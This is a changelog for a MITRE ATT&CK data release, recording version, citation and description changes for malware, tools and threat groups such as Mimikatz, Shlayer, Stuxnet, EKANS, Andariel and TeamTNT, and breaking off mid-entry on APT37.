description[Kinsing](https://attack.mitre.org/software/S0599) is Golang-based malware that runs a cryptocurrency miner and attempts to spread itself to other hosts in the victim environment. (Citation: Aqua Kinsing April 2020)(Citation: Sysdig Kinsing November 2020)[Kinsing](https://attack.mitre.org/software/S0599) is Golang-based malware that runs a cryptocurrency miner and attempts to spread itself to other hosts in the victim environment. (Citation: Aqua Kinsing April 2020)(Citation: Sysdig Kinsing November 2020)(Citation: Aqua Security Cloud Native Threat Report June 2021)
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Aqua Security Cloud Native Threat Report June 2021', 'description': 'Team Nautilus. (2021, June). Attacks in the Wild on the Container Supply Chain and Infrastructure. Retrieved August 26, 2021.', 'url': 'https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation'}

[S0349] LaZagne

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX FieldOld valueNew Value
modified2020-11-23 18:34:49.979000+00:002021-10-15 16:56:52.156000+00:00
x_mitre_version1.21.3

[S0451] LoudMiner

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2020-09-01 20:55:31.256000+00:002021-10-12 16:31:13.272000+00:00
x_mitre_version1.11.2

[S0532] Lucifer

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2021-03-17 15:53:21.249000+00:002021-10-01 20:33:55.926000+00:00
x_mitre_version1.01.1

[S0449] Maze

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2020-10-19 18:35:15.941000+00:002021-08-18 23:46:05.071000+00:00
x_mitre_version1.11.2

[S0179] MimiPenguin

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 17:03:42.864000+00:002021-10-15 16:57:34.776000+00:00
x_mitre_version1.11.2

[S0002] Mimikatz

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX FieldOld valueNew Value
modified2021-02-09 15:10:55.563000+00:002021-05-20 14:25:59.596000+00:00
x_mitre_version1.31.4

[S0051] MiniDuke

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX FieldOld valueNew Value
modified2020-09-23 15:19:58.668000+00:002021-10-14 21:21:51.872000+00:00
x_mitre_version1.21.3

[S0198] NETWIRE

Current version: 1.4

Version changed from: 1.3 → 1.4


Old Description
New Description
t1[NETWIRE](https://attack.mitre.org/software/S0198) is a publt1[NETWIRE](https://attack.mitre.org/software/S0198) is a publ
>icly available, multiplatform remote administration tool (RA>icly available, multiplatform remote administration tool (RA
>T) that has been used by criminal and APT groups since at le>T) that has been used by criminal and APT groups since at le
>ast 2012.(Citation: FireEye APT33 Sept 2017) (Citation: McAf>ast 2012.(Citation: FireEye APT33 Sept 2017)(Citation: McAfe
>ee Netwire Mar 2015) (Citation: FireEye APT33 Webinar Sept 2>e Netwire Mar 2015)(Citation: FireEye APT33 Webinar Sept 201
>017)>7)
Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-25 23:47:00.562000+00:002021-10-12 11:21:09.567000+00:00
description[NETWIRE](https://attack.mitre.org/software/S0198) is a publicly available, multiplatform remote administration tool (RAT) that has been used by criminal and APT groups since at least 2012.(Citation: FireEye APT33 Sept 2017) (Citation: McAfee Netwire Mar 2015) (Citation: FireEye APT33 Webinar Sept 2017)[NETWIRE](https://attack.mitre.org/software/S0198) is a publicly available, multiplatform remote administration tool (RAT) that has been used by criminal and APT groups since at least 2012.(Citation: FireEye APT33 Sept 2017)(Citation: McAfee Netwire Mar 2015)(Citation: FireEye APT33 Webinar Sept 2017)
x_mitre_version1.31.4

[S0039] Net

Current version: 2.3

Version changed from: 2.2 → 2.3

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-23 20:17:30.467000+00:002021-10-15 20:33:54.392000+00:00
x_mitre_version2.22.3

[S0359] Nltest

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2019-04-22 19:06:17.325000+00:002021-10-07 16:41:18.760000+00:00
x_mitre_version1.01.1

[S0402] OSX/Shlayer

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1[OSX/Shlayer](https://attack.mitre.org/software/S0402) is a t1[OSX/Shlayer](https://attack.mitre.org/software/S0402) is a 
>Trojan designed to install adware on macOS. It was first dis>Trojan designed to install adware on macOS that was first di
>covered in 2018.(Citation: Carbon Black Shlayer Feb 2019)(Ci>scovered in 2018.(Citation: Carbon Black Shlayer Feb 2019)(C
>tation: Intego Shlayer Feb 2018)>itation: Intego Shlayer Feb 2018)
Details
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://www.carbonblack.com/2019/02/12/tau-threat-intelligence-notification-new-macos-malware-variant-of-shlayer-osx-discovered/
values_changed
STIX FieldOld valueNew Value
modified2020-10-22 18:35:57.777000+00:002021-10-16 20:44:20.719000+00:00
description[OSX/Shlayer](https://attack.mitre.org/software/S0402) is a Trojan designed to install adware on macOS. It was first discovered in 2018.(Citation: Carbon Black Shlayer Feb 2019)(Citation: Intego Shlayer Feb 2018)[OSX/Shlayer](https://attack.mitre.org/software/S0402) is a Trojan designed to install adware on macOS that was first discovered in 2018.(Citation: Carbon Black Shlayer Feb 2019)(Citation: Intego Shlayer Feb 2018)
external_references[2]['source_name']CrossriderZshlayer
external_references[2]['description'](Citation: Intego Shlayer Apr 2018)(Citation: Malwarebytes Crossrider Apr 2018)(Citation: sentinelone shlayer to zshlayer)
external_references[3]['source_name']Carbon Black Shlayer Feb 2019Crossrider
external_references[3]['description']Carbon Black Threat Analysis Unit. (2019, February 12). New macOS Malware Variant of Shlayer (OSX) Discovered. Retrieved August 8, 2019.(Citation: Intego Shlayer Apr 2018)(Citation: Malwarebytes Crossrider Apr 2018)
external_references[4]['source_name']Intego Shlayer Feb 2018Carbon Black Shlayer Feb 2019
external_references[4]['description']Long, Joshua. (2018, February 21). OSX/Shlayer: New Mac malware comes out of its shell. Retrieved August 28, 2019.Carbon Black Threat Analysis Unit. (2019, February 12). New macOS Malware Variant of Shlayer (OSX) Discovered. Retrieved August 8, 2019.
external_references[4]['url']https://www.intego.com/mac-security-blog/osxshlayer-new-mac-malware-comes-out-of-its-shell/https://www.carbonblack.com/2019/02/12/tau-threat-intelligence-notification-new-macos-malware-variant-of-shlayer-osx-discovered/
external_references[5]['source_name']Intego Shlayer Apr 2018Intego Shlayer Feb 2018
external_references[5]['description']Vrijenhoek, Jay. (2018, April 24). New OSX/Shlayer Malware Variant Found Using a Dirty New Trick. Retrieved September 6, 2019.Long, Joshua. (2018, February 21). OSX/Shlayer: New Mac malware comes out of its shell. Retrieved August 28, 2019.
external_references[5]['url']https://www.intego.com/mac-security-blog/new-osxshlayer-malware-variant-found-using-a-dirty-new-trick/https://www.intego.com/mac-security-blog/osxshlayer-new-mac-malware-comes-out-of-its-shell/
external_references[6]['source_name']Malwarebytes Crossrider Apr 2018sentinelone shlayer to zshlayer
external_references[6]['description']Reed, Thomas. (2018, April 24). New Crossrider variant installs configuration profiles on Macs. Retrieved September 6, 2019.Phil Stokes. (2020, September 8). Coming Out of Your Shell: From Shlayer to ZShlayer. Retrieved September 13, 2021.
external_references[6]['url']https://blog.malwarebytes.com/threat-analysis/2018/04/new-crossrider-variant-installs-configuration-profiles-on-macs/https://www.sentinelone.com/blog/coming-out-of-your-shell-from-shlayer-to-zshlayer/
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Intego Shlayer Apr 2018', 'description': 'Vrijenhoek, Jay. (2018, April 24). New OSX/Shlayer Malware Variant Found Using a Dirty New Trick. Retrieved September 6, 2019.', 'url': 'https://www.intego.com/mac-security-blog/new-osxshlayer-malware-variant-found-using-a-dirty-new-trick/'}
external_references{'source_name': 'Malwarebytes Crossrider Apr 2018', 'description': 'Reed, Thomas. (2018, April 24). New Crossrider variant installs configuration profiles on Macs. Retrieved September 6, 2019.', 'url': 'https://blog.malwarebytes.com/threat-analysis/2018/04/new-crossrider-variant-installs-configuration-profiles-on-macs/'}
x_mitre_aliasesZshlayer

[S0352] OSX_OCEANLOTUS.D

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
values_changed
STIX FieldOld valueNew Value
modified2020-12-02 15:04:45.553000+00:002021-10-15 01:59:21.279000+00:00
x_mitre_version2.02.1

[S0072] OwaAuth

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 03:01:04.725000+00:002021-06-17 19:03:17.306000+00:00
x_mitre_version1.11.2

[S0012] PoisonIvy

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX FieldOld valueNew Value
modified2021-01-06 19:32:28.390000+00:002021-10-16 01:58:17.100000+00:00
x_mitre_version1.21.3

[S0194] PowerSploit

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX FieldOld valueNew Value
modified2021-02-09 14:00:16.093000+00:002021-10-05 01:24:41.497000+00:00
x_mitre_version1.31.4

[S0029] PsExec

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_contributors['Janantha Marasinghe']
values_changed
STIX FieldOld valueNew Value
modified2020-03-20 19:20:27.565000+00:002021-06-24 13:47:24.660000+00:00
x_mitre_version1.11.2

[S0262] QuasarRAT

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-28 21:39:15.210000+00:002021-06-22 13:57:03.434000+00:00
external_references[2]['description'](Citation: TrendMicro Patchwork Dec 2017)(Citation: TrendMicro Patchwork Dec 2017)(Citation: Securelist APT10 March 2021)
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Securelist APT10 March 2021', 'description': 'GREAT. (2021, March 30). APT10: sophisticated multi-layered loader Ecipekac discovered in A41APT campaign. Retrieved June 17, 2021.', 'url': 'https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/'}

[S0496] REvil

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-06 14:42:52.993000+00:002021-08-18 19:38:51.122000+00:00
x_mitre_version1.11.2

[S0258] RGDoor

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 17:26:05.875000+00:002021-09-10 18:59:39.228000+00:00
x_mitre_version1.11.2

[S0446] Ryuk

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-14 21:34:42.810000+00:002021-08-18 19:31:22.741000+00:00
x_mitre_version1.11.2

[S0559] SUNBURST

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-24 22:36:06.030000+00:002021-10-18 15:01:16.538000+00:00
x_mitre_version2.02.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsDaniyal Naeem, BT Security

[S0546] SharpStage

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2020-12-28 21:12:01.371000+00:002021-08-18 23:48:44.783000+00:00
x_mitre_version1.01.1

[S0543] Spark

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-19 22:03:52.327000+00:002021-08-18 23:49:01.615000+00:00
x_mitre_version1.01.1

[S0242] SynAck

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 18:17:52.697000+00:002021-09-08 19:22:44.438000+00:00
external_references[2]['description']Ivanov, A. et al.. (2018, May 7). SynAck targeted ransomware uses the Doppelgänging technique. Retrieved May 22, 2018.Ivanov, A. et al. (2018, May 7). SynAck targeted ransomware uses the Doppelgänging technique. Retrieved May 22, 2018.
x_mitre_version1.21.3

[S0595] ThiefQuest

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-26 21:28:09.905000+00:002021-10-05 01:47:00.880000+00:00
x_mitre_version1.01.1

[S0330] Zeus Panda

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 18:32:20.484000+00:002021-08-18 23:49:03.468000+00:00
x_mitre_version1.11.2

[S0160] certutil

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2019-07-31 19:57:28.859000+00:002021-08-16 17:50:50.307000+00:00
x_mitre_version1.11.2

[S0404] esentutl

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-20 18:41:43.461000+00:002021-10-01 17:48:10.492000+00:00
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsEdward Millington
Patches

[S0128] BADNEWS

Current version: 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2020-10-21 18:22:52.183000+00:002021-06-21 12:32:12.581000+00:00

[S0114] BOOTRASH

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2021-02-09 15:15:35.182000+00:002021-06-09 18:58:41.760000+00:00
x_mitre_contributors[0]Christopher Glyer, FireEye, @cglyerChristopher Glyer, Mandiant, @cglyer

[S0593] ECCENTRICBANDWAGON

Current version: 1.0


Old Description
New Description
t1[ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593t1[ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593
>) is a Remote Access Tool (RAT) used by [Lazarus Group](http>) is a remote access Trojan (RAT) used by North Korean cyber
>s://attack.mitre.org/groups/G0032) that was first identified> actors that was first identified in August 2020. It is a re
> in August 2020. It is a reconnaissance tool--with keyloggin>connaissance tool--with keylogging and screen capture functi
>g and screen capture functionality--used for information gat>onality--used for information gathering on compromised syste
>hering on compromised systems.(Citation: CISA EB Aug 2020)>ms.(Citation: CISA EB Aug 2020)
Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-14 15:25:05.979000+00:002021-10-15 17:28:32.335000+00:00
description[ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593) is a Remote Access Tool (RAT) used by [Lazarus Group](https://attack.mitre.org/groups/G0032) that was first identified in August 2020. It is a reconnaissance tool--with keylogging and screen capture functionality--used for information gathering on compromised systems.(Citation: CISA EB Aug 2020)[ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593) is a remote access Trojan (RAT) used by North Korean cyber actors that was first identified in August 2020. It is a reconnaissance tool--with keylogging and screen capture functionality--used for information gathering on compromised systems.(Citation: CISA EB Aug 2020)

[S0554] Egregor

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-27 02:48:00.306000+00:002021-10-14 21:39:11.008000+00:00

[S0009] Hikit

Current version: 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-23 01:52:58.448000+00:002021-06-09 18:59:27.117000+00:00
x_mitre_contributors[0]Christopher Glyer, FireEye, @cglyerChristopher Glyer, Mandiant, @cglyer

[S0398] HyperBro

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2020-06-23 00:20:31.733000+00:002021-10-12 19:21:39.068000+00:00
external_references[2]['description']Falcone, R. and Lancaster, T.. (2019, May 28). Emissary Panda Attacks Middle East Government Sharepoint Servers. Retrieved July 9, 2019.Falcone, R. and Lancaster, T. (2019, May 28). Emissary Panda Attacks Middle East Government Sharepoint Servers. Retrieved July 9, 2019.

[S0075] Reg

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2018-10-17 00:14:20.652000+00:002021-08-23 20:25:18.606000+00:00
external_references[2]['url']http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.htmlhttps://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

[S0466] WindTail

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2020-06-26 13:33:42.533000+00:002021-10-15 06:31:19.173000+00:00

[S0350] zwShell

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 18:41:33.050000+00:002021-06-16 15:50:05.015000+00:00
external_references[2]['url']https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdfhttps://scadahacker.com/library/Documents/Cyber_Events/McAfee%20-%20Night%20Dragon%20-%20Global%20Energy%20Cyberattacks.pdf

mobile-attack

New Software

[S0655] BusyGasper

Current version: 1.0

Description: [BusyGasper](https://attack.mitre.org/software/S0655) is Android spyware that has been in use since May 2016. There have been less than 10 victims, all who appear to be located in Russia, that were all infected via physical access to the device.(Citation: SecureList BusyGasper)

Minor Version Changes

[S0422] Anubis

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX FieldOld valueNew Value
modified2021-01-20 16:01:19.142000+00:002021-09-20 13:50:01.923000+00:00
x_mitre_version1.21.3

[S0529] CarbonSteal

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-19 15:40:36.215000+00:002021-09-20 13:54:19.819000+00:00
x_mitre_version1.01.1

[S0407] Monokle

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2020-01-21 15:30:39.236000+00:002021-09-24 14:52:40.927000+00:00
x_mitre_version1.11.2

ics-attack

New Software

[S0606] Bad Rabbit

Current version: 1.0

Description: [Bad Rabbit](https://attack.mitre.org/software/S0606) is a self-propagating ransomware that affected the Ukrainian transportation sector in 2017. [Bad Rabbit](https://attack.mitre.org/software/S0606) has also targeted organizations and consumers in Russia. (Citation: Secure List Bad Rabbit)(Citation: ESET Bad Rabbit)(Citation: Dragos IT ICS Ransomware)


[S0608] Conficker

Current version: 1.0

Description: [Conficker](https://attack.mitre.org/software/S0608) is a computer worm first detected in October 2008 that targeted Microsoft Windows using the MS08-067 Windows vulnerability to spread.(Citation: SANS Conficker) In 2016, a variant of [Conficker](https://attack.mitre.org/software/S0608) made its way on computers and removable disk drives belonging to a nuclear power plant.(Citation: Conficker Nuclear Power Plant)


[S0605] EKANS

Current version: 1.0

Description: [EKANS](https://attack.mitre.org/software/S0605) is ransomware variant that first appeared in mid-December 2019. [EKANS](https://attack.mitre.org/software/S0605) is distinct from other ransomware as it was written in Golang and aims to stop services and processes related to Industrial Control Systems.(Citation: Dragos EKANS)(Citation: Palo Alto Unit 42 EKANS)


[S0604] Industroyer

Current version: 1.0

Description: [Industroyer](https://attack.mitre.org/software/S0604) is a sophisticated malware framework designed to cause an impact to the working processes of Industrial Control Systems (ICS), specifically components used in electrical substations.(Citation: ESET Industroyer) [Industroyer](https://attack.mitre.org/software/S0604) was used in the attacks on the Ukrainian power grid in December 2016.(Citation: Dragos Crashoverride 2017) This is the first publicly known malware specifically designed to target and impact operations in the electric grid.(Citation: Dragos Crashoverride 2018)


[S0607] KillDisk

Current version: 1.0

Description: [KillDisk](https://attack.mitre.org/software/S0607) is a disk-wiping tool designed to overwrite files with random data to render the OS unbootable. It was first observed as a component of [BlackEnergy](https://attack.mitre.org/software/S0089) malware during cyber attacks against Ukraine in 2015. [KillDisk](https://attack.mitre.org/software/S0607) has since evolved into stand-alone malware used by a variety of threat actors against additional targets in Europe and Latin America; in 2016 a ransomware component was also incorporated into some [KillDisk](https://attack.mitre.org/software/S0607) variants.(Citation: KillDisk Ransomware)(Citation: ESEST Black Energy Jan 2016)(Citation: Trend Micro KillDisk 1)(Citation: Trend Micro KillDisk 2)


[S0603] Stuxnet

Current version: 1.0

Description: [Stuxnet](https://attack.mitre.org/software/S0603) was the first publicly reported piece of malware to specifically target industrial control systems devices. [Stuxnet](https://attack.mitre.org/software/S0603) is a large and complex piece of malware that utilized multiple different behaviors including multiple zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: CISA ICS Advisory ICSA-10-272-01)(Citation: ESET Stuxnet Under the Microscope)(Citation: Langer Stuxnet) [Stuxnet](https://attack.mitre.org/software/S0603) was discovered in 2010, with some components being used as early as November 2008.(Citation: Symantec W.32 Stuxnet Dossier)

Minor Version Changes

[S0496] REvil

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-06 14:42:52.993000+00:002021-08-18 19:38:51.122000+00:00
x_mitre_version1.11.2

[S0446] Ryuk

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-14 21:34:42.810000+00:002021-08-18 19:31:22.741000+00:00
x_mitre_version1.11.2
Deletions

[S1001] Bad Rabbit

Current version: 1.0

Description: [Bad Rabbit](https://collaborate.mitre.org/attackics/index.php/Software/S0005) is a self-propagating (“wormable”) ransomware that affected the transportation sector in Ukraine. (Citation: ESET Bad Rabbit Oct 2017)


[S1003] Conficker

Current version: 1.0

Description: [Conficker](https://collaborate.mitre.org/attackics/index.php/Software/S0012) is a computer worm that targets Microsoft Windows and was first detected in November 2008. It targets a vulnerability (MS08-067) in Windows OS software and dictionary attacks on administrator passwords to propagate while forming a botnet. Conficker made its way onto computers and removable disk drives in a nuclear power plant. (Citation: Malware Shuts Down German Nuclear Power Plant on Chernobyl's 30th Anniversary)


[S0017] EKANS

Current version: 1.0

Description: [EKANS](https://collaborate.mitre.org/attackics/index.php/Software/S0017) is ransomware that was first seen December 2019 and later reported to have impacted operations at Honda automotive production facilities.(Citation: Forbes Snake Ransomware June 2020)(Citation: MalwareByes Honda and Enel Ransomware June 2020)(Citation: Dragos EKANS February 2020) EKANS has a hard-coded kill-list of processes, including some associated with common ICS software platforms (e.g., GE Proficy historian, Honeywell HMIWeb).(Citation: Dragos EKANS February 2020) If the malware discovers these processes on the target system, it will stop, encrypt, and rename the process to prevent the program from restarting. This malware should not be confused with the “Snake” malware associated with the Turla group. The ICS processes documented within the malware’s kill-list is similar to those defined by the MEGACORTEX software.(Citation: FireEye OT Ransomware July 2020)(Citation: Pylos January 2020)(Citation: Dragos EKANS June 2020)The ransomware was initially reported as “Snake”, however, to avoid confusion with the unrelated Turla APT group security researchers spelled it backwards as EKANS.


[S1004] Industroyer

Current version: 1.0

Description: [Industroyer](https://collaborate.mitre.org/attackics/index.php/Software/S0001) is a sophisticated piece of malware designed to cause an [Impact](https://collaborate.mitre.org/attackics/index.php/Impact) to the working processes of Industrial Control Systems (ICS), specifically ICSs used in electrical substations.(Citation: ESET Win32/Industroyer) Industroyer was alleged to be used in the attacks on the Ukrainian power grid in December 2016.(Citation: Dragos Crashoverride)(Citation: CISA Alert (TA17-163A))(Citation: Dragos Crashoverride 2018)(Citation: Dragos Crashoverride 2019)


[S1005] Killdisk

Current version: 1.0

Description: In 2015 the BlackEnergy malware contained a component called KillDisk. KillDisk's main functionality is to overwrite files with random data, rendering the OS unbootable. (Citation: ESET BlackEnergy Jan 2016)


[S1008] Stuxnet

Current version: 1.0

Description: [Stuxnet](https://collaborate.mitre.org/attackics/index.php/Software/S0010) was the first publicly reported piece of malware to specifically target industrial control systems devices. Stuxnet is a large and complex piece of malware that utilized multiple different complex tactics including multiple zero-day vulnerabilites, a sophisticated Windows rootkit, and network infection routines.(Citation: Wired W32.Stuxnet Dossier Feb 2011)(Citation: Symantec W32.Stuxnet Writeup)(Citation: CISA ICS Advisory (ICSA-10-238-01B))(Citation: SCADAhacker Stuxnet Mitigation Jan 2014)

Groups

enterprise-attack

New Groups

[G0138] Andariel

Current version: 1.0

Description: [Andariel](https://attack.mitre.org/groups/G0138) is a North Korean state-sponsored threat group that has been active since at least 2009. [Andariel](https://attack.mitre.org/groups/G0138) has primarily focused its operations--which have included destructive attacks--against South Korean government agencies, military organizations, and a variety of domestic companies; they have also conducted cyber financial operations against ATMs, banks, and cryptocurrency exchanges. [Andariel](https://attack.mitre.org/groups/G0138)'s notable activity includes Operation Black Mine, Operation GoldenAxe, and Campaign Rifle.(Citation: FSI Andariel Campaign Rifle July 2017)(Citation: IssueMakersLab Andariel GoldenAxe May 2017)(Citation: AhnLab Andariel Subgroup of Lazarus June 2018)(Citation: TrendMicro New Andariel Tactics July 2018)(Citation: CrowdStrike Silent Chollima Adversary September 2021) [Andariel](https://attack.mitre.org/groups/G0138) is considered a sub-set of [Lazarus Group](https://attack.mitre.org/groups/G0032), and has been attributed to North Korea's Reconnaissance General Bureau.(Citation: Treasury North Korean Cyber Groups September 2019) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.


[G0135] BackdoorDiplomacy

Current version: 1.0

Description: [BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) is a cyber espionage threat group that has been active since at least 2017. [BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has targeted Ministries of Foreign Affairs and telecommunication companies in Africa, Europe, the Middle East, and Asia.(Citation: ESET BackdoorDiplomacy Jun 2021)


[G0132] CostaRicto

Current version: 1.0

Description: [CostaRicto](https://attack.mitre.org/groups/G0132) is a suspected hacker-for-hire cyber espionage campaign that has targeted multiple industries worldwide since at least 2019. [CostaRicto](https://attack.mitre.org/groups/G0132)'s targets, a large portion of which are financial institutions, are scattered across Europe, the Americas, Asia, Australia, and Africa, with a large concentration in South Asia.(Citation: BlackBerry CostaRicto November 2020)


[G0137] Ferocious Kitten

Current version: 1.0

Description: [Ferocious Kitten](https://attack.mitre.org/groups/G0137) is a threat group that has primarily targeted Persian-speaking individuals in Iran since at least 2015.(Citation: Kaspersky Ferocious Kitten Jun 2021)


[G0136] IndigoZebra

Current version: 1.0

Description: [IndigoZebra](https://attack.mitre.org/groups/G0136) is a suspected Chinese cyber espionage group that has been targeting Central Asian governments since at least 2014.(Citation: HackerNews IndigoZebra July 2021)(Citation: Checkpoint IndigoZebra July 2021)(Citation: Securelist APT Trends Q2 2017)


[G0133] Nomadic Octopus

Current version: 1.0

Description: [Nomadic Octopus](https://attack.mitre.org/groups/G0133) is a Russian-speaking cyberespionage threat group that has primarily targeted Central Asia, including local governments, diplomatic missions, and individuals, since at least 2014. [Nomadic Octopus](https://attack.mitre.org/groups/G0133) has been observed conducting campaigns involving Android and Windows malware, mainly using the Delphi programming language, and building custom variants.(Citation: Security Affairs DustSquad Oct 2018)(Citation: Securelist Octopus Oct 2018)(Citation: ESET Nomadic Octopus 2018)


[G0139] TeamTNT

Current version: 1.0

Description: [TeamTNT](https://attack.mitre.org/groups/G0139) is a threat group that has primarily targeted cloud and containerized environments. The group as been active since at least October 2019 and has mainly focused its efforts on leveraging cloud and container resources to deploy cryptocurrency miners in victim environments. (Citation: Palo Alto Black-T October 2020)(Citation: Lacework TeamTNT May 2021)(Citation: Intezer TeamTNT September 2020)(Citation: Cado Security TeamTNT Worm August 2020)(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro TeamTNT)(Citation: ATT TeamTNT Chimaera September 2020)(Citation: Aqua TeamTNT August 2020)(Citation: Intezer TeamTNT Explosion September 2021)


[G0131] Tonto Team

Current version: 1.0

Description: [Tonto Team](https://attack.mitre.org/groups/G0131) is a suspected Chinese state-sponsored cyber espionage threat group that has primarily targeted South Korea, Japan, Taiwan, and the United States since at least 2009; by 2020 they expanded operations to include other Asian as well as Eastern European countries. [Tonto Team](https://attack.mitre.org/groups/G0131) has targeted government, military, energy, mining, financial, education, healthcare, and technology organizations, including through the Heartbeat Campaign (2009-2012) and Operation Bitter Biscuit (2017).(Citation: Kaspersky CactusPete Aug 2020)(Citation: ESET Exchange Mar 2021)(Citation: FireEye Chinese Espionage October 2019)(Citation: ARS Technica China Hack SK April 2017)(Citation: Trend Micro HeartBeat Campaign January 2013)(Citation: Talos Bisonal 10 Years March 2020)


[G0134] Transparent Tribe

Current version: 1.0

Description: [Transparent Tribe](https://attack.mitre.org/groups/G0134) is a suspected Pakistan-based threat group that has been active since at least 2013, primarily targeting diplomatic, defense, and research organizations in India and Afghanistan.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)(Citation: Talos Transparent Tribe May 2021)

Major Version Changes

[G0067] APT37

Current version: 2.0

Version changed from: 1.5 → 2.0


Old Description
New Description
t1[APT37](https://attack.mitre.org/groups/G0067) is a suspectet1[APT37](https://attack.mitre.org/groups/G0067) is a North Ko
>d North Korean cyber espionage group that has been active si>rean state-sponsored cyber espionage group that has been act
>nce at least 2012. The group has targeted victims primarily >ive since at least 2012. The group has targeted victims prim
>in South Korea, but also in Japan, Vietnam, Russia, Nepal, C>arily in South Korea, but also in Japan, Vietnam, Russia, Ne
>hina, India, Romania, Kuwait, and other parts of the Middle >pal, China, India, Romania, Kuwait, and other parts of the M
>East. [APT37](https://attack.mitre.org/groups/G0067) has als>iddle East. [APT37](https://attack.mitre.org/groups/G0067) h
>o been linked to following campaigns between 2016-2018: Oper>as also been linked to the following campaigns between 2016-
>ation Daybreak, Operation Erebus, Golden Time, Evil New Year>2018: Operation Daybreak, Operation Erebus, Golden Time, Evi
